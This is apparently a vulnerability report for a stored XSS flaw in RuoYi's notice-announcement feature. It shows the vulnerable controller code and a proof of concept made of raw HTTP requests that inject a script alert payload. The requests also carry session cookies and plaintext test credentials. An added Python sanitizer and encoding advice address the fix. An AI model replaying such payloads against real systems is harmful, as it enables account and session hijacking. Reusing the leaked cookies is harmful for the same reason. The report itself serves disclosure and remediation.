Stored XSS vulnerability #294

@NinjaGPT

Description

Summary

When users add notification announcements, they can insert XSS payloads without any restrictions, which are then stored in the database. On the display page, the content is output without any encoding, resulting in a stored XSS vulnerability.

Details

Taint Source:

  • com/ruoyi/web/controller/system/SysNoticeController.java

    @RequiresPermissions("system:notice:add")
    @Log(title = "通知公告", businessType = BusinessType.INSERT)
    @PostMapping("/add")
    @ResponseBody
    public AjaxResult addSave(@Validated SysNotice notice)
    {
        // noticeContent is taken from the request and persisted as-is, with no sanitization
        notice.setCreateBy(getLoginName());
        return toAjax(noticeService.insertNotice(notice));
    }

Taint Sink:

  • com/ruoyi/web/controller/system/SysNoticeController.java

    @RequiresPermissions("system:notice:edit")
    @GetMapping("/edit/{noticeId}")
    public String edit(@PathVariable("noticeId") Long noticeId, ModelMap mmap)
    {
        // the stored notice is handed to the edit view, which renders its content without encoding
        mmap.put("notice", noticeService.selectNoticeById(noticeId));
        return prefix + "/edit";
    }

POC

Injecting XSS payload

POST /system/notice/add HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 184
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://tonghu.phone4rent.com:8090
Referer: http://tonghu.phone4rent.com:8090/system/notice/add
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_8b02a318fde5831da10426656a43d03c=1728619084; _ga=GA1.1.1576547266.1728619085; username=test; password=123456; _ga_73YJPXJTLX=GS1.1.1728631376.2.0.1728631376.0.0.0; JSESSIONID=a05dcac6-d2f5-417c-be55-55140fd15c7f; rememberMe=xADWIbdMf6eu/6.................
Connection: close

noticeTitle=test&noticeType=1&noticeContent=%3Cp%3E%3Ca+href%3D%22http%3A%2F%2F1%22+target%3D%22_blank%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%3C%2Fa%3E%3Cbr%3E%3C%2Fp%3E&status=0

XSS will be triggered when the OUTPUT page is accessed.

GET /system/notice/edit/11 HTTP/1.1
Host: 127.0.0.1:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://tonghu.phone4rent.com:8090/index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_8b02a318fde5831da10426656a43d03c=1728619084; _ga=GA1.1.1576547266.1728619085; username=test; password=123456; _ga_73YJPXJTLX=GS1.1.1728631376.2.0.1728631376.0.0.0; JSESSIONID=a05dcac6-d2f5-417c-be55-55140fd15c7f; rememberMe=xADWIbdMf6eu/6Jmw.......
Connection: close

Impact

https://portswigger.net/web-security/cross-site-scripting#impact-of-xss-vulnerabilities
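To make the two halves of this bug concrete from the defender's side, here is an added example (not part of this report and not the project's code) that models the check missing at the taint source. It is written in Python rather than the project's Java so it runs stand-alone: it parses the exact form body from the POC above (embedded as a constructed copy), treats noticeTitle as plain text (full HTML encoding) and noticeContent as rich text from an editor (allowlist sanitization, since wholesale encoding would break the intended <p>/<a>/<br> markup), and shows that the <script> element, inline event handlers and javascript: URLs are stripped while the benign markup survives. The tag and attribute allowlist is an assumed, deliberately small set, not anything the project defines.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed copy of the POST body shown in the report's POC.
SAMPLE_BODY = (
    "noticeTitle=test&noticeType=1&noticeContent=%3Cp%3E%3Ca+href%3D%22http%3A%2F%2F1%22"
    "+target%3D%22_blank%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%3C%2Fa%3E%3Cbr%3E"
    "%3C%2Fp%3E&status=0"
)

# Assumed allowlist for editor output: structural/inline formatting only, no scripting vectors.
ALLOWED_TAGS = {"p", "br", "a", "b", "i", "strong", "em", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "target"}}
VOID_TAGS = {"br"}
DROP_CONTENT_TAGS = {"script", "style"}  # element and its text are removed entirely


def safe_url(value):
    """Accept only relative or http(s) URLs; rejects javascript:, data:, vbscript: etc."""
    scheme = urlsplit((value or "").strip()).scheme.lower()
    return scheme in ("", "http", "https")


class AllowlistSanitizer(HTMLParser):
    """Re-serialises a fragment keeping only allowlisted tags/attributes; all text is re-encoded."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag (img, svg, iframe, ...) is dropped, its text is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops on* handlers, style, srcdoc, ...
            if name == "href" and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> is emitted as <br>

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # text nodes can never form tags


def sanitize_html(fragment):
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def sanitize_notice_form(body):
    """Model of the check the /system/notice/add handler lacks: clean each field for its context."""
    fields = parse_qs(body, keep_blank_values=True)
    first = lambda key: fields.get(key, [""])[0]
    return {
        "noticeTitle": escape(first("noticeTitle"), quote=True),   # plain-text field
        "noticeType": first("noticeType"),
        "noticeContent": sanitize_html(first("noticeContent")),    # rich-text field
        "status": first("status"),
    }


if __name__ == "__main__":
    cleaned = sanitize_notice_form(SAMPLE_BODY)
    print(cleaned["noticeContent"])  # <p><a href="http://1" target="_blank"></a><br></p>
```

Sanitizing at the store boundary is one layer; the edit/detail templates should still render untrusted fields with an encoding output (in Thymeleaf, th:text rather than th:utext) wherever the content is not meant to be HTML, so that records already in the database do not keep firing.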
